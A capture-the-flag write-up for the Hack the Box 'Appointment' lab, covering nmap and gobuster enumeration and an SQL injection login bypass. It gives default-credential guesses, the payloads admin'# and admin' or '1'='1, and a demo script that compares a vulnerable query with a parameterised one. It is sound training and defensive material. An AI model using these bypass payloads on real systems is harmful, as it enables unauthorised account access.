Hack the Box — Appointment

HTB Tags: #Linux #SQL #SQLi #MariaDB

This is the first box in Tier 1 of the Starting Point series, with a focus on SQL injection against a Linux target. Let's start by enumerating with the standard commands, ping and nmap.

ping

ping $IP -c 4

nmap

nmap $IP

Only one port is showing, and it is the default HTTP port serving a web page.

website

Looks like we have a login page showing:

Trying the usual username and password combinations does not provide access:
* admin:admin
* guest:guest
* user:user
* root:root
* administrator:password

Although we know the challenge is SQLi based, let's complete the enumeration with a gobuster review.

gobuster

Quickly looking through the discovered directories does not turn up anything that can assist.

sqli

What is SQL injection (SQLi)? PortSwigger, the provider of the Burp Suite set of tools, describes it as:

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior. In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

An excellent explanation of how the SQL query behind a login page is built and executed by the database is given by Niveet Palan in his Handbook for SQL Injection.

I will let you review his document, and will only discuss the process for the admin user here.

We type in the username `admin` followed by a single quote, which closes the string literal in the query so the database still searches for the `admin` username. Adding a hash (`#`, a MariaDB/MySQL comment marker) then comments out the rest of the query, so the password comparison for the specified username is never evaluated. As long as there is a user called `admin`, we gain access. Most times I repeat the user details in the password field; in this case you can actually enter anything.

We could also use `admin' or '1'='1`, which in a similar manner forces the WHERE clause to evaluate to TRUE: `'1'='1'` is always true, so the row for `admin` is returned regardless of the password supplied.
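To make the two payloads concrete, here is an added example (not code from the original write-up or from the HTB target) that rebuilds the kind of login query the article describes and runs both bypasses against it. It uses an in-memory SQLite database as a stand-in for the target's MariaDB; the `users` table, the `admin` row and its password are constructed for the demo. Because SQLite does not treat `#` as a comment, the comment-style payload is shown with `-- ` (accepted by both engines) where the article uses `admin'#`. The hardened version alongside it uses a parameterised query, which keeps the quote and comment characters as data.

```python
"""Toy login check: vulnerable string concatenation vs. parameterised query.

Added example, not from the original page. SQLite stands in for MariaDB,
so the comment payload uses `-- ` instead of the MariaDB-only `#`.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one account whose password is not guessable.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret-not-guessable')")
    return con


def build_vulnerable_query(username: str, password: str) -> str:
    # The pattern the write-up exploits: user input pasted straight into SQL.
    return (
        "SELECT username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    # True if the concatenated query returns at least one row.
    # With `admin'-- ` the password comparison is commented away;
    # with `admin' or '1'='1` the WHERE clause is true for the admin row
    # because AND binds tighter than OR.
    row = con.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Hardened form: placeholders send the input as bound values, so quotes
    # and comment markers never reach the SQL parser as syntax.
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    attempts = [
        ("admin", "wrong"),               # honest failed login
        ("admin'-- ", "anything"),        # comment out the password check
        ("admin' or '1'='1", "anything"),  # force the WHERE clause to be true
    ]
    for user, pw in attempts:
        print(repr(user), "->", build_vulnerable_query(user, pw))
        print("  vulnerable:", login_vulnerable(con, user, pw),
              " safe:", login_safe(con, user, pw))
```

Running the script prints the exact query string each payload produces, which is the easiest way to see why the closing quote matters: everything after it is interpreted as SQL, not as the password.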

We now gain access and the challenge flag.

A further resource listing these injection payloads can be found at:

summary

An interesting way to gain access to a target. It is also worthwhile following and understanding the Injection Handbook mentioned above, as it gives you a better understanding of how database queries are built, which you will definitely use later.

James Pearson

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.